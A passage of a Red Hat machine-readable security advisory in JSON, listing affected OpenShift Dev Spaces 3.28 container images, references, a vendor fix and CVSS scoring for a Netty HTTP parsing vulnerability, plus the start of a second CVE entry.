"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:f1cf981295bdfddb68c8cb83e03da7cbec9aada7dce16586a1508351b11c2e73_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0de97d2e0e6589cfd3889eca0284154e857c4deef4ab45420e0d75bfc8030252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:12a042cb9e94c6502b61c6d08a49bc8b81f8d3e23932b08c29566906508801d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:25137cf516214eac04d5f1fd2ad9a38658e8fc741600b50b4c44f00db437cf01_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:5cb0df6d628f764eead0f67206b7251b737932ae04f81dd8c1fd416d2c1be455_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:060059363ac7718e9599e0612c95b583b563fac5a6616dfecc9c42413b2a3f56_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:1bd73bae94af4a5be1b62e555df3a1b863f22c427f95d2bbbd24e4ffcce7a264_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:baff02ec968933899873d989d8faf4fb27aedcbca5406009408638678a832b96_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:e9347202b67b4a2ad17b820af7148d4473764996ce1368d5460b6fff2d79935a_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:0912cc02b70a7cc6895cdfde15647865de99f03880715c6b8e584adf70c14707_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1d4269b06d396a7ec1e952daa47a4bd5b00915d6d0cd5a3270fe471a6a75517b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1e2b5bff8974b54038cf635faaa293458bcfa2e75a9ee57e2712b30d9b35e0ac_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:6798e67f7d39b831b6c947a50c4420c9d92160079bbd2d62d07b9f991be4abfd_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:1a56d8592fe048ebe0c1549ec0249a5f61842cbb5c58545649b394df98fbae06_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:224939e501ffed4ffe09a5198138486e72b04d1486787a6c4c3abee8cd7dffba_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:c10a24ed873306c38e5d7aa96d9ffa9b71b2e6dac2ee18f557af008ef460d708_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:cb73c78e8214996408490b36f176be3b6d0047a116f705478afd162c8260292d_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:06172d66fc92096c6d1b517ac2edfc35e06255859152ea8aa83ea57bb789bb0b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:2268f482a70624ca1670675df27f0a6a4e7ea41669f021059ebafbc0465d5411_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:505295ab2811eb723a334501a853eb238c2ec96073f36296226d58fa12aefd3c_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:93ae4574a68c0f16acf2146ab09b56e446fd012697c1194cfa9f4ac717a300c2_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:2f672c4b1bc77639a5ccf2f7f923691aefe2ab2e6e76de830a0727633c80af17_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:763e7470768ecf6551d9d9af7a7a48605ceafaad3e001f48ae08ce94d6facb42_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:80c9c0c3aa02ae7b447c33a8bb9aff07fc243b2b484db28975b79b9007612629_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:8a4c7ae0ffaa1f6d3b87c60d27817a3d1636a5609cf159dce66d80c2f0ad6f9b_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42584"
},
{
"category": "external",
"summary": "RHBZ#2477224",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477224"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42584",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42584"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42584",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42584"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-57rv-r2g8-2cj3",
"url": "https://github.com/netty/netty/security/advisories/GHSA-57rv-r2g8-2cj3"
}
],
"release_date": "2026-05-13T18:10:48.437000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-10T19:42:14+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:3eda021137370af8e8cf2c996a7a10733824f1d23e56534efd4f46aa40ce7777_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:af397f83a7394b676299501672623ca9c01b8351db0d73531b0bf325e55558f6_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b73dc3b1ac96a877aba609233dc0ae60685716b272e3dc1f8db59c23c438049d_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:cef4269f4d91814bc144c94718d6aa59c4e03eab341eebf87ec05e38e7b7e49f_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:06d061cdda5ac9ddd48647c2c86b5ceb5a5f25acc7e314ebb319a690af588209_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:80842e498a91358d73a511ec25acc2a6d26dca76c9f775108778700e8541c252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:a062fd2a510100fc03a5f14102104a34b2e24bddc5661ac95ed39dad6a5f46b9_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fbdf611c5aac4e33644ed8eb5a72b88b5c5a6690f24a64a3cff7002a483827d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:4f63b37a50013481f95ca70ea3e0baf257601aa86ba6dd3efe5ad039b3170f04_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:56f4b3132a1785e7a323fc9fb5e1d2040d30a7c8d81fd00a42d619a8881e9492_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:e2d0551322d379e77a72218fb37244f8a187e6ff52ae6f61e7b673c2c23ce39f_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:f8200f2b4b8c5cb5a5aef1fa6f8f15297cb720512a0df784629129afc0d5810a_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:25123"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:7e20cd1d638296bcab93a704bfce3ff7cf6c0f7e632e07e69fcacfedf9e8b120_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:83e1013b0ce89c1f4fc0038c1cb7eab2fd541a6fb1de6a0596fe669a76cde1f4_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:9d47eee451c3d7c7a0c2d83824849ac4053110107997a41df26fe28f9b4749de_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:bb9e332650eb73ce20accc25d8bc73bb935e39e0bc6a9b0e7b163707ae25ce6f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0ce3e6baa0af251b5ae5e8cc64de363aa144c420e1416a2a7bf522aefe0b6dd3_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:324758a4c214f743ba3f38eee3ae2c3f42eac80ac4c10801e103fc531d73cf51_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:82994d108c21e3f53c2d87bdec8ddcdb0c0f81c7f1ed93ac996fe83046ea8ed1_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:b1b3d7416bc5c1609fa890229fc0a0809bc1906813bb4834f57dc610f88974c1_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:5bcd49999db0f7ac5fbc2461c7ac50dec267ee8b4f64c95bdcd746188ab0bfa0_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:62ecbc41b3f1d3cd81e9593fdacac8397d1fc3f616717b247346ac218b7a2ff7_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ee3d2e13995479495aa2a2f3b7a8f8133f7b69d0e753b00e3fe2ee00416b3a9_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:b52e83ecc17aefda4a83671c267b3086bb5f92d78259c3e3b2b389042bac7230_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:1cef563af30567f7aba3baeb6fa94494f93ac07350a23fabaa67d079f780f640_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ae7dc192f8ca8c78dc6eb12ef2846b45057e22e183207743aad9261fb5adcb6e_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ca07c7ae5cdcf93df21348d92c4828e4615b324f2f765907b3459f0d5090c628_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:dee20a799ccf5bae94ed50fd2d79ea162cd7384990427db93281fe590d6c7767_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:f78d91e983f0f8be019382c2fb620a655bf9f8204bd839e9bfb9c35e1ab8fc90_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4757ac1e8c5a53e2d9a7ce896dbcc1232806a47a29470285c6fee9778a2f0b25_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4e4a72be08cf691ee40dc79d2e625a5b59cf709e15219537ee04a1f03a3df23e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a5b3c16ca82c2585debbef262d8de80bb8566384c916915d9fce92d233268d1c_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:dd4b506d04a2e7be2c62c53a7e1f60fe828ba7f0fc2aab7f6a752f1a4c4e699b_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:21d1288562fc757e4714cde2c253c077fba1b7762ab4041e8b3f55d9da1e7b82_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:2423f169dcd795c9326d59d953b4507485bf2ef8971f066969dfb2ca921bdf1f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:5e4c074f39614f529e79c8de011446a0b621fb189485eff0061f95f99f0950f8_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:f1cf981295bdfddb68c8cb83e03da7cbec9aada7dce16586a1508351b11c2e73_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0de97d2e0e6589cfd3889eca0284154e857c4deef4ab45420e0d75bfc8030252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:12a042cb9e94c6502b61c6d08a49bc8b81f8d3e23932b08c29566906508801d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:25137cf516214eac04d5f1fd2ad9a38658e8fc741600b50b4c44f00db437cf01_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:5cb0df6d628f764eead0f67206b7251b737932ae04f81dd8c1fd416d2c1be455_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:060059363ac7718e9599e0612c95b583b563fac5a6616dfecc9c42413b2a3f56_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:1bd73bae94af4a5be1b62e555df3a1b863f22c427f95d2bbbd24e4ffcce7a264_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:baff02ec968933899873d989d8faf4fb27aedcbca5406009408638678a832b96_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:e9347202b67b4a2ad17b820af7148d4473764996ce1368d5460b6fff2d79935a_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:3eda021137370af8e8cf2c996a7a10733824f1d23e56534efd4f46aa40ce7777_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:af397f83a7394b676299501672623ca9c01b8351db0d73531b0bf325e55558f6_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b73dc3b1ac96a877aba609233dc0ae60685716b272e3dc1f8db59c23c438049d_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:cef4269f4d91814bc144c94718d6aa59c4e03eab341eebf87ec05e38e7b7e49f_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:06d061cdda5ac9ddd48647c2c86b5ceb5a5f25acc7e314ebb319a690af588209_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:80842e498a91358d73a511ec25acc2a6d26dca76c9f775108778700e8541c252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:a062fd2a510100fc03a5f14102104a34b2e24bddc5661ac95ed39dad6a5f46b9_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fbdf611c5aac4e33644ed8eb5a72b88b5c5a6690f24a64a3cff7002a483827d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:4f63b37a50013481f95ca70ea3e0baf257601aa86ba6dd3efe5ad039b3170f04_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:56f4b3132a1785e7a323fc9fb5e1d2040d30a7c8d81fd00a42d619a8881e9492_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:e2d0551322d379e77a72218fb37244f8a187e6ff52ae6f61e7b673c2c23ce39f_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:f8200f2b4b8c5cb5a5aef1fa6f8f15297cb720512a0df784629129afc0d5810a_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:0912cc02b70a7cc6895cdfde15647865de99f03880715c6b8e584adf70c14707_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1d4269b06d396a7ec1e952daa47a4bd5b00915d6d0cd5a3270fe471a6a75517b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1e2b5bff8974b54038cf635faaa293458bcfa2e75a9ee57e2712b30d9b35e0ac_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:6798e67f7d39b831b6c947a50c4420c9d92160079bbd2d62d07b9f991be4abfd_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:1a56d8592fe048ebe0c1549ec0249a5f61842cbb5c58545649b394df98fbae06_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:224939e501ffed4ffe09a5198138486e72b04d1486787a6c4c3abee8cd7dffba_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:c10a24ed873306c38e5d7aa96d9ffa9b71b2e6dac2ee18f557af008ef460d708_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:cb73c78e8214996408490b36f176be3b6d0047a116f705478afd162c8260292d_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:06172d66fc92096c6d1b517ac2edfc35e06255859152ea8aa83ea57bb789bb0b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:2268f482a70624ca1670675df27f0a6a4e7ea41669f021059ebafbc0465d5411_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:505295ab2811eb723a334501a853eb238c2ec96073f36296226d58fa12aefd3c_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:93ae4574a68c0f16acf2146ab09b56e446fd012697c1194cfa9f4ac717a300c2_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:2f672c4b1bc77639a5ccf2f7f923691aefe2ab2e6e76de830a0727633c80af17_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:763e7470768ecf6551d9d9af7a7a48605ceafaad3e001f48ae08ce94d6facb42_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:80c9c0c3aa02ae7b447c33a8bb9aff07fc243b2b484db28975b79b9007612629_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:8a4c7ae0ffaa1f6d3b87c60d27817a3d1636a5609cf159dce66d80c2f0ad6f9b_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "netty: io.netty/netty-codec-http: Netty: Incorrect HTTP response parsing leads to data confusion"
},
{
"cve": "CVE-2026-42587",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-05-13T19:01:35.415881+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:7e20cd1d638296bcab93a704bfce3ff7cf6c0f7e632e07e69fcacfedf9e8b120_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:83e1013b0ce89c1f4fc0038c1cb7eab2fd541a6fb1de6a0596fe669a76cde1f4_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:9d47eee451c3d7c7a0c2d83824849ac4053110107997a41df26fe28f9b4749de_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:bb9e332650eb73ce20accc25d8bc73bb935e39e0bc6a9b0e7b163707ae25ce6f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0ce3e6baa0af251b5ae5e8cc64de363aa144c420e1416a2a7bf522aefe0b6dd3_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:324758a4c214f743ba3f38eee3ae2c3f42eac80ac4c10801e103fc531d73cf51_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:82994d108c21e3f53c2d87bdec8ddcdb0c0f81c7f1ed93ac996fe83046ea8ed1_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:b1b3d7416bc5c1609fa890229fc0a0809bc1906813bb4834f57dc610f88974c1_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:5bcd49999db0f7ac5fbc2461c7ac50dec267ee8b4f64c95bdcd746188ab0bfa0_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:62ecbc41b3f1d3cd81e9593fdacac8397d1fc3f616717b247346ac218b7a2ff7_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ee3d2e13995479495aa2a2f3b7a8f8133f7b69d0e753b00e3fe2ee00416b3a9_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:b52e83ecc17aefda4a83671c267b3086bb5f92d78259c3e3b2b389042bac7230_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:1cef563af30567f7aba3baeb6fa94494f93ac07350a23fabaa67d079f780f640_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ae7dc192f8ca8c78dc6eb12ef2846b45057e22e183207743aad9261fb5adcb6e_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ca07c7ae5cdcf93df21348d92c4828e4615b324f2f765907b3459f0d5090c628_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:dee20a799ccf5bae94ed50fd2d79ea162cd7384990427db93281fe590d6c7767_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:f78d91e983f0f8be019382c2fb620a655bf9f8204bd839e9bfb9c35e1ab8fc90_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4757ac1e8c5a53e2d9a7ce896dbcc1232806a47a29470285c6fee9778a2f0b25_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4e4a72be08cf691ee40dc79d2e625a5b59cf709e15219537ee04a1f03a3df23e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a5b3c16ca82c2585debbef262d8de80bb8566384c916915d9fce92d233268d1c_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:dd4b506d04a2e7be2c62c53a7e1f60fe828ba7f0fc2aab7f6a752f1a4c4e699b_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:21d1288562fc757e4714cde2c253c077fba1b7762ab4041e8b3f55d9da1e7b82_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:2423f169dcd795c9326d59d953b4507485bf2ef8971f066969dfb2ca921bdf1f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:5e4c074f39614f529e79c8de011446a0b621fb189485eff0061f95f99f0950f8_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:f1cf981295bdfddb68c8cb83e03da7cbec9aada7dce16586a1508351b11c2e73_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0de97d2e0e6589cfd3889eca0284154e857c4deef4ab45420e0d75bfc8030252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:12a042cb9e94c6502b61c6d08a49bc8b81f8d3e23932b08c29566906508801d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:25137cf516214eac04d5f1fd2ad9a38658e8fc741600b50b4c44f00db437cf01_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:5cb0df6d628f764eead0f67206b7251b737932ae04f81dd8c1fd416d2c1be455_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:060059363ac7718e9599e0612c95b583b563fac5a6616dfecc9c42413b2a3f56_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:1bd73bae94af4a5be1b62e555df3a1b863f22c427f95d2bbbd24e4ffcce7a264_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:baff02ec968933899873d989d8faf4fb27aedcbca5406009408638678a832b96_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:e9347202b67b4a2ad17b820af7148d4473764996ce1368d5460b6fff2d79935a_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:0912cc02b70a7cc6895cdfde15647865de99f03880715c6b8e584adf70c14707_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1d4269b06d396a7ec1e952daa47a4bd5b00915d6d0cd5a3270fe471a6a75517b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1e2b5bff8974b54038cf635faaa293458bcfa2e75a9ee57e2712b30d9b35e0ac_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:6798e67f7d39b831b6c947a50c4420c9d92160079bbd2d62d07b9f991be4abfd_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:1a56d8592fe048ebe0c1549ec0249a5f61842cbb5c58545649b394df98fbae06_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:224939e501ffed4ffe09a5198138486e72b04d1486787a6c4c3abee8cd7dffba_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:c10a24ed873306c38e5d7aa96d9ffa9b71b2e6dac2ee18f557af008ef460d708_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:cb73c78e8214996408490b36f176be3b6d0047a116f705478afd162c8260292d_arm64",
